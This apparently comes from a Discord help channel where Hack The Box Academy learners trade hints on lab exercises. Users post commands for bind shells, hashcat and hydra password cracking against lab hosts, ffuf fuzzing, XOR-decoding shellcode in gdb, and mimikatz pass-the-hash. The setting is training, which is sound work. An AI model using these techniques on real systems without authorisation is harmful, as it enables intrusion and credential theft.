otherwise top-right of the app is a search bar

#

imo the mobile one is just stupid

gray merlin
#

CTRL+F preloads the channel in search.

woeful walrus
#

Or, you could own that it wasn't a welcoming way to follow up a legitimate response. This server is 0/2 with me coming here earne3stly looking for help and people just being kinda dickish for no reason. When I'm just here looking for a little help. No need.

fathom pendant
#

mobile doesn't let you specify channel

fringe urchin
fathom pendant
fathom pendant
#

i even offered a way for you to ensure it doesn't get yeeted

next bronze
#

I literally wrote that message to help people with that question, not sure how that's not helpful

fringe urchin
woeful walrus
#

You weren't helpful at any point, Xre0us was. Stop following up like you did good here. You were just standoffish, that was it.

fathom pendant
grizzled schooner
#

Marcie, I tried that again and just get "nc: Permission denied" lol

grizzled schooner
tepid path
#

I don’t really like pineapples; they hurt my teeth.

fringe urchin
# fathom pendant weird

Maybe with the recent updste it got fixed. But ngl search on mobile since the last big update about that it just went downhill

fathom pendant
#

glad your issue is resolved

fathom pendant
grizzled schooner
#

Oh alright cool thanks... Figured cause I saw the role I would ask but if there's a channel that answers questions etc that's even better

next bronze
#

yeah feel free to ask over there

frozen stone
#

Hey, I'm struggling with the Abusing HTTP Misconfigurations HARD skill assessment. Can someone please DM me for help? Thank you.

fathom pendant
grizzled schooner
#

ah alright gotcha

#

and I don't know if you saw my reponse, but tried again and just get "nc: Permission denied"

fathom pendant
#

i did; it sounds like nc doesn't have the right perms

#

try setting a higher port to connect to

#

4444/9999/42069

grizzled schooner
#

weird, I tried 4444 originally, let me try again

#

bingo, not sure what happened but I'm good now, sorry to bug you

fathom pendant
#

np

#

sometimes it's a case of "I did nothing different and now it works? ???????

grizzled schooner
#

yeah, the first time I did 4444 it just said tcp connection successful but got no shell... tried a diff port and got the perm denied, tried 4444 again and we're good

#

could've been an error I did idk, but it worked lol

#

And I assume if I disconnect from the bind shell, I would then have to run the syntax again on the target to re-open the shell?

fathom pendant
#

idr

grizzled schooner
#

alright no worries, thanks for the help though, I'm off to bed, goodnight!

loud dagger
#

is it just me or do a lot of the questions in htb modules require information from modules you haven't done yet

runic remnant
fathom pendant
#

nothing works isn't particularly descriptive, if you're on the free plan and using the pwnbox then you're gonna be restricted on the internet

loud dagger
#

i'm on a student plan and i'm not even using the pwnbox i'm just using a terminal

uncut kindle
#

Hi i have a question

loud dagger
runic remnant
uncut kindle
#

do any of you know how to de code messages?

loud dagger
#

could you be more specific

uncut kindle
# loud dagger could you be more specific

you mean like this💀 SW4gdGh1IhdvcmxkJ3Mgy29yzswgysbnbG10Y2ggdW5mdXJscywKU3B1YwsgbxkgbmFtZswgdGh1iG9uZsb1bnNhaWqsCkfuzcbmcm9tihrozsb2b2iklcbjihnoywxsigj1igx1zc4kq29sbgvjdcbtzswgyw5kihnoyxjoihroaxmgd29yb29ybgqncybmywxslg==

loud dagger
#

it's base64

uncut kindle
#

wth is that😭

#

wha???

#

whats base64

#

srry im new to de coding stuff

loud dagger
#

what does this have to do with htb modules

uncut kindle
#

idk im just trying to find out wth is says😭

#

i dont even know what this servers for

loud dagger
#

why are you asking in this server in this channel

uncut kindle
#

bc i cant talk in gen

cloud urchin
#

this is a channel dedicated to questions about the academy, a place for education.. not random stuff like that

loud dagger
#

then why the fuck are you in it and why are you asking here

uncut kindle
#

BC IDK WHERE TOO

cloud urchin
#

try /r/masterhacker

loud dagger
#

don't

uncut kindle
#

ye im not

#

so do you have any idea how to solve my mess?

cloud urchin
#

no one here can help you with that, we've said that in other ways

loud dagger
#

where did you get it from? it decodes to a bunch of non unicode characters

#

it looks like it's supposed to be a poem but half of it is unknown characters

uncut kindle
#

it was given to me to try and de code first person to gets something

loud dagger
#

this is the wrong server

#

it's base64

#

there have fun

uncut kindle
#

so what is the codd you found?

loud dagger
#

omfg man

cloud urchin
#

the code is: go away

loud dagger
#

i would say take the hint but i've literally told you directly to go away

fathom pendant
loud dagger
#

ok this is absolutely killing me

next bronze
#

what is

fathom pendant
#

break down the commands one by one; add each | one at a time until you see why it's not working

next bronze
#

ah

fathom pendant
loud dagger
#

i'm not asking for help with the problem, all i'm asking is if it's just me

next bronze
#

to be fair that question is a bit out of the left field

loud dagger
#

this module doesn't even cover curl

fathom pendant
loud dagger
#

that's still not what i'm asking

fathom pendant
#

like yes the linux module is out of order imo

loud dagger
#

good to know, thank you

fathom pendant
#

but not much that can't be googled or read ahead and circle back

loud dagger
#

might do web requests and/or intro to networking before this one since i'm on the infosec foundations path

#

i mean i've gone as far as to google the actual question and i've found three completely different answers, none of which were correct

#

so i'm just going to read ahead

cloud urchin
#

try chatgpt

fathom pendant
#

well if none of the results are correct; then I suggest breaking down where it's breaking down to try and figure out what breaks and where

loud dagger
#

chatgpt is worthless

fathom pendant
#

if it's giving you no answer or too high/low

cloud urchin
#

its only as good as its user

loud dagger
#

i asked it a basic question about tr the other day and it kept giving me some completely made up answers

fathom pendant
#

my suggestion was moreso: you said "not working" earlier

next bronze
dim wolf
#

the curl question is a bit unfair but it's asking you to chain commands together using the pipe operator

fathom pendant
#

and is a linux command

loud dagger
#

hold on let me find it

fathom pendant
#

it can only pull so much

loud dagger
#

nvm it's gone

#

but it kept trying to tell me the ascii value for - is between N and M or something completely wrong like that

#

and every time i corrected it it just gave me a different completely wrong answer

cloud urchin
#

works for me

loud dagger
#

is it between N and M

#

no it's not

#

it's nowhere near the latin alphabet, which starts at 65 iirc

fathom pendant
next bronze
#

what

fathom pendant
#

sounds like you asked it a bad question

cloud urchin
#

i guess since the courses don't work, google doesn't work, and chatgpt doesn't work, you'll never learn about curl.

next bronze
#

symbols are before the alphabet

loud dagger
#

that's what i just said, dash is 45 and the alphabet starts at 65 but chatgpt kept trying to tell me that dash is in the middle of the alphabet

loud dagger
#

why does everyone on discord constantly misinterpret, ignore, or selectively read every fucking question i ask

#

my original question had nothing to do with curl, all i wanted to know is if i was right about htb module questions containing information from future modules

#

completely ignore the part about curl, pretend i never even mentioned curl

cloud urchin
#

the answer is: no. i have never seen a module not teach you how to complete it. some of them have requirements of certain knowledge before you'll be able to comfortably go through the module, for example it may expect you to know basic linux commands like "dir" and "curl"

next bronze
#

and relax, being mad at other people won't help you get better answers or make people want to answer them

loud dagger
#

idk how much better at asking questions i could possibly get when i ask stuff like "which of the two is better, x or y" and every fuckin person answers something other than x or y

upbeat pike
#

Late to the party, but to answer your original question @loud dagger, I found the same specifically to that exercise. I found I had to lean on prior Linux knowledge to answer it. I then scrolled back through the module to make sure I hadn’t just missed it, but couldn’t see it there. And then I would have been able to piece the answer together with stuff that came later on.

loud dagger
#

thank you

fathom pendant
#

so idk how you're not getting the expected answer

loud dagger
#

would you pretty pretty please ignore the other messages i sent; they have nothing to do with my original question, all i was doing was giving an example

#

they're gone, i deleted them, they were just an example

fathom pendant
#

cool

loud dagger
#

joe answered my question, thank you joe

fathom pendant
#

¯_(ツ)_/¯

#

gl with the rest

loud dagger
#

thank you

fathom pendant
#

i'm just commenting on the fact that in your original post you said you used a handful and didn't get the right answer. I apologize for dragging it out further than that

rustic sage
crystal steeple
woeful walrus
#

I'm still totally stuck on Intro to Assembly Language Skill Assessment.

I don't understand what the question want's as an answer. Am I looking for a flag???

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

next bronze
#

the elf program contains a shellcode which has been xor'd, your task is to decrypt the shellcode and run it to get the flag, to do that, you'll need to disassemble the binary and reverse the encryption with the xor key found inside

woeful walrus
#

I have xord every single stack value against the key in search of something that looks meaningful. I dont see anything that looks like a flag.

next bronze
#

because it's shellcode, after you xor it, run it with the shellcode loader to get the flag

woeful walrus
#

is the answer an address?? an HTB{flag} I just don't even know what we're looking for for an answer here at this point

next bronze
#

it's a normal flag, you'll know when you see it

rustic sage
#

disassembling and writing shellcode, fun times

woeful walrus
#

I loaded it in the loader.py and got nothing. I have no idea what I'm doing wrong

woeful walrus
#

I'm really trying everything here. I just went so far as to try changing the endianess of every hex value.

hexed trout
#

hello may i have some help with the lfi module

next bronze
#

you'll need to get verified to post images, read #welcome

hexed trout
#

am i missing something or is the flag path incorrect ?

rustic sage
next bronze
#

so why /usr/share/flags/flag.txt instead of /flag.txt

hexed trout
#

actually nvm i tried again and it worked now?

#

thanks!!

rustic sage
woeful walrus
#

I've gone through it about 12 times. My method has changed slightly each time, but the most recent run through was...

./shellcoder.sh loaded_shellcode
gdb ./loaded_shellcode
break *0x0000000000401000
run
x/16gx $rsp
info registers rbx
set $rbx=0x2144d2144d2144d2
python print("0x%x" % (0x[every address] ^ 0x2144d2144d2144d2))

Get array of 14? hex values.

Concatenated all hex values.

python loader.py '[that concatenated value]'

Then I tried reversing the endianness of every one of those hex values before concatenating them. and running the loader.py again, but it didn't yield anything.

tacit grove
#

lab down?

normal turret
#

Hi guys

#

Can anyone help me out with netcat

shut quest
woeful walrus
next bronze
#

the question asked you to use assembly to xor it, not sure why you're using python

#

and did you follow my hint and the hint in the question

next bronze
woeful walrus
#

Not sure what both of us did wrong to get that

#

but my list of xor'd stack addresses against the xor key produced one that was missing a leading 0.

#

adding the 0 produced the flag.

#

I truly hope I did something wrong. Because I'm.... not happy.

#

😦 anyways. I got it. Thanks for your help @next bronze

dire abyss
#

anyone having a difficult time spawing their target?

shut quest
shut quest
tacit grove
red latch
#

Can someone suggest me a good resource for the computer networking?

clever topaz
#

why cant i dump hash with mimikatz? ive tried sam cache and all possible lsadump command

#

in section Pass the Hash (PtH)

upbeat island
#

I’m still lost in HTB footprinting with hashcat

#

My hashcat status is EXHAUSTED

#

What am I supposed to do.

cloud urchin
#

what section of footprinting is hashcat

upbeat island
#

In ipmi

#

The last question “what is the cleartext account password

#

My commands are “hashcat -a 0 -m 100 hashes.txt /usr/share/wordlists/rockyou.txt

cloud urchin
#

Did you try the passwd list that the module says to use, ipmi_passwords.txt?

upbeat island
#

To be Honest nope

#

Let me try

cloud urchin
#

yeah if it's exhausted that means it went through the whole list and found no matches

cloud urchin
#

so another wordlist is good to try

upbeat island
clever topaz
cloud urchin
#

i haven't done that module so i can't really comment, not sure. exhausted simply means no password matched though.

clever topaz
#

ive nt acc and i run mimi as admin already

next bronze
upbeat island
next bronze
#

wrong mode

#

ipmi right

upbeat island
#

Yes

#

Using mode 100 and I already try with mode 7300

cloud urchin
#

would hashcat return exhuasted if the hash was incompatible with the mode though?

#

i thought it errored out

upbeat island
#

I do not think so, and I’m sure that the mode I need to use is the 100

next bronze
#

it's not 100

#

7300, given in the module

upbeat island
#

With 7300 is not giving anything

#

Wooooowwwww I got it

#

Yesssssssss

#

🤣🤣🤣🤣🤣 FINALLY AFTER TWO DAYS

shut quest
shut quest
next bronze
shut quest
clever topaz
#

but i cant dump the hash, imagine i got the clear txt password but not hash kek

next bronze
#

oh nvm I'm blind

clever topaz
#

how to dump hash lol, i tried lsadump:sam but it gave me other user hash

#

or should i just switch the plaintext pw to hash myself

cloud urchin
#

this apex legends drama is wild

brittle crest
#

Has anyone else had issues with ZAP not replacing strings in the Web Proxy module? Burp seems to be working fine when using match&replace.

shut quest
shut quest
clever topaz
#

oh i use mimikatz to pth to the victim machine?

next bronze
#

oh it's that one

#

check attacking lsass section

#

do you already have the hash?

clever topaz
#

i see i thought ill need to login to the windows in order to run mimikatz

#

nope will try that method from gubarz later having class now

#

thanks all

next bronze
#

yeah you'll need to get the hash before you can pass it

dire abyss
next bronze
#

did you ssh into the target

dire abyss
#

yes im connected right now

#

i see a lot of traffic to 172.16.5.130 but not 5.5

next bronze
#

you know how to filter by a specific ip in wireshark?

dire abyss
#

yeah ip.addr = = 172.16.5.5

#

if i ping the 5.5 i generate the traffic but its icmp it doesnt recover the common name

#

im guessing this isnt working as expected?

next bronze
#

if you're trying to get the CN, you can use other tools

dire abyss
#

dig?

next bronze
#

the most common scanning tool, it's also in the section

dire abyss
#

gotcha.. running that. I wish the wireshark thing worked.. unless its not meant to and eventually you need to run the scan

next bronze
#

maybe the lab just doesn't have ARP request from DC, the lab is not always the exact same as the section

#

also yes I don't think you'll get the CN from the wireshark capture

shut quest
dire abyss
#

while i was running the nmap scan, i dont know it triggered something or just coincidence but i did eventually get 1 piece of info from wire shark, protocol is "BROWSER" and in the info it says "Host Announcement ..." and it does the first part of the CN but not domain.

#

anyways, thanks guys i was able to complete the module

soft cedar
#

module?

dire abyss
shut quest
vivid star
#

why am I not able to speak on other channels ?

#

somebody help

soft cedar
cloud urchin
shut quest
dire abyss
#

understood, i think i prefere responder between the three shown, although i should use wireshark more since i have to use it at work

vivid star
#

wait, how do I trust the link ?

#

how do I trust hackthebox ?

#

with my master password

#

I mean all are hackers here, I could be hacked

cloud urchin
#

reach out to support

vivid star
#

@soft cedar

next bronze
#

true, you don't have to get verified 4Head

cloud urchin
#

reach out to support on the website

vivid star
#

well what exactly would they do

cloud urchin
#

or scroll your lazy ass up in discord yourself

vivid star
#

By mistake I set my country as Afghanistan

#

it was set as default.

#

what do I do now ?

#

bruh not able to verify, someone please gimme access

#

I want to learn reverse engineering, bug, kernel exploiting, privilidge escalation and dll injecting through process hacker asap

spark charm
#

Guys who solved the perfection machine

remote latch
spark charm
#

The machine always returns 502 is that part of machine

shut quest
spark charm
shut quest
shut quest
spark charm
vivid star
#

yessssssssss

#

I succesfully verified

#

Jatt is here to hack yall

limber surge
#

DETECTING WINDOWS ATTACKS WITH SPLUNK >Detecting Kerberoasting/AS-REProasting

can someone hint me for this.

Modify and employ the Splunk search provided at the "Detecting Kerberoasting - SPN Querying" part of this section on all ingested data (All time). Enter the name of the user who initiated the process that executed an LDAP query containing the "(&(samAccountType=805306368)(servicePrincipalName=)*" string at 2023-07-26 16:42:44 as your answer. Answer format: CORP_

simple ledge
#

Hey all, has anyone completed https://academy.hackthebox.com/module/54/section/490 ? I'm running the following ffuf command: ffuf -w SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://<IP>:<PORT>?FUZZ=key -fs xxx - but don't seem to be getting anything back. I tried a few of the larger wordlists but still nothing. Seems like it should be pretty straightforward, not sure what I'm missing.

autumn pilot
#

Look at the last example in the section, it utilizes admin.academy.htb

clever topaz
#

Pass the Hash (PtH) section, i still dk how to get into DC01 machine or send payload to DC01, can someone help me

#

i mean DC01 is just smb right

next bronze
#

get the hash from one of the machines you have admin on, then pth to dc01

clever topaz
#

the target can be "dc01" instead of ip address?

next bronze
#

if the entry has been added to your hosts file, or it's in the dns record, yes

clever topaz
#

but its a smb inside a machine i suppose ... how is it possible to have individual ip address

simple ledge
next bronze
clever topaz
#

oh i didnt know HAHAHAHA

#

but how do i get the ip addy of dc01

next bronze
#

smb inside the machine so it's the machine's ip

autumn pilot
clever topaz
#

ya currently i got ms-01 ip

#

how can i get dc01 ip ya

next bronze
#

use what you have learned in footprinting and host discovery, there are a lot of ways

#

you know the subnet, scan it

simple ledge
clever topaz
#

learnt alot

clever topaz
#

connected to the dc but shell wont come out 😭

soft cedar
next bronze
#

if it's the last question in that section there are specific tools that need to be used

clever topaz
#

the demo on htb actually got the shell after doing what i did

next bronze
#

tried running the command again?

clever topaz
#

tried > 10 times already

#

prolly need to reset server

sly grotto
#

could you give me a hint plz?
HTTP ATTACKS
HTTP Response Splitting
solved
hint: You need to pay much attention to redirection and payloads.
First, try to exploit and get your cookie (set a test cookie) in the log, and then try using that payload for admin (also pay attention to the lab hint).

timber hatch
#

i am stuck at skill assesment 1 attacking common services, i found the username with smtp enum, but now i am not able to make any progress. could somebody give me a hint what service i have to attack next?

remote latch
#

no idea what you are saying

clever topaz
#

still cant after reset 😦

soft cedar
analog dock
vague cedar
#

Module: NETWORK ENUMERATION WITH NMAP
Section: Firewall and IDS/IPS Evasion - Easy Lab
Question: Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer.
approach/solution i tried: sudo nmap -sV 10.129.226.86, i get the answer
i also tried nmap --script smb-os-discovery 10.129.226.86 , but by using this command i was not able to get the desired result, is there anyother way i can tried to get the OS version?

timber hatch
steady dust
#

Does anyone have any idea why psgetsys.ps1 return this erorr "Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are
assigned to the caller"
At C:\tools\psgetsys.ps1:175 char:1

  • [MyProcess]::CreateProcessFromParent($ppid,$command,"$command $cmdarg ...
  •   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
      + FullyQualifiedErrorId : Win32Exception" ? 😄
soft cedar
#

yes bruteforce the password but target a different service

mighty steppe
#

ls

soft cedar
soft cedar
timber hatch
soft cedar
#

Great, so bruteforce it w/ hydra.

vague cedar
#

HTB Module NETWORK ENUMERATION WITH NMAP walk through
Section: Firewall and IDS/IPS Evasion - Medium Lab
Question: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
approach/solution i tried: $ sudo nmap -sSU -p 53 --script dns-nsid 10.129.226.86, not getting the desired answer, please let me know if i am doing something wrong

analog dock
#

Nasir, those skills assessments are to practice the things taught in the modules. I see you asked about the easy lab 15 mins ago and medium lab now. I recommend you try some more things before asking for hints here

clever topaz
timber hatch
soft cedar
#

what commands did you try ?

timber hatch
#

or it was because i used hte wrong pw list. i found it now with the seclist.
this i tried:
hydra -l 'fiona@inlanefreight.htb' -P pw.txt smtp://10.129.7.109
hydra -l 'fiona' -P pw.txt smtp://10.129.7.109

and also with the rockyou list.

here the pw.txt are the passwords from the ressources.

#

but anyway. thank you 🙂

#

found it with hydra

midnight galleon
#

is there a problem with instance again?

#

it just gives empty page

soft cedar
#

Don’t think so

#

what are you trying to do?

#

That’s not fun 😂

#

yeah agreed.

midnight galleon
timber hatch
#

good to know😆

midnight galleon
#

and yes, this is not intended

soft cedar
#

Ok I understand, I asked because some assessments / exercises require navigating to another directory.

midnight galleon
#

it's the web proxys' skill assessment but the problem persists across any skill assessment

autumn pilot
#

did you visit the endpoint mentioned in the first question

midnight galleon
#

yes

autumn pilot
#

and does it load, because I just tested it and it indeed does load

#

From the screenshots you are just visiting the IP of the target without specifying the php page

midnight galleon
#

might try to respawn

autumn pilot
midnight galleon
#

then wtf

tight flint
#

I would be very grateful if someone give me a hint on the question from Suricata Rule Development Part 1 Section of the working with ids/ips module 🙂

fathom pendant
shadow current
#

Linux Local Privilege Escalation - Skills Assessment

  • any clue how can i find flag1
  • I was able to capture flag 2 and 3
  • I am now the user b
  • now im trying to capture flag 4? already check the ports and there is a tomcat installed on the server there is also a user called tomcat while checking the /etc/passwd

can anyone send help?

thorn berry
#

Hi guys please I need your help. I just started my journey into cybersecurity and am using hack the box to get hands on. I have been able to pwned 3 machines but am stock on the 4th, trying to scan using nmap but it keep saying "seems host is down" but actually host is up cos I can ping it.
Please help

upbeat oak
thorn berry
shut quest
shadow current
shut quest
serene spoke
#

Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.

Inveigh.ps1 runs on the 172.16.8.50 (PowerShell runs with administrative privilege), I get no hash after long time, whatsoever. Do I need to invoke some behavior to force this user to broadcast traffic so I Inveigh cathes it?

shut quest
void grotto
marsh echo
shut quest
marsh echo
#

of course 🙂 but I don't understand why he says it's the wrong format.

fathom pendant
#

Linux01$

#

Btw

#

The $ is important here

#

AFAIK at least

#

Also it could be the keytab you're using is expired

shadow current
shut quest
marsh echo
marsh echo
fathom pendant
#

You don't need to do that

#

-k uses the kerberos auth, either KRB5CCNAME environment variable or the loaded keytab file

shut quest
marsh echo
#

I need to find another keytab specific to the linux01$ user? it doesn't seem to work.

fathom pendant
#

There's a tool shown in the section for enumerating and finding keytab/ccache files

marsh echo
#

yeah /opt/linikatz.sh

fathom pendant
#

It'll show you more than what you've manually found so far

marsh echo
#

thx a lot in fact i had already used the tool but i had transferred it from my attacking machine to the target machine via nc and it didn't display as much information as it does now i thank you for the help

high reef
#

hello everyone

#

i went throght the page source manually and found nothing

#

any hints would be grately apprecaited also nothing in wpscan as well only mail-masta and contact-form-7

shut quest
ancient needle
#

Just did the SIEM fundamentals module.. is there no explanation to the skill assessment answers? Or it’s just you’re right or you’re wrong - good luck

high reef
fathom pendant
#

They provide the minimum info needed to point you in the right direction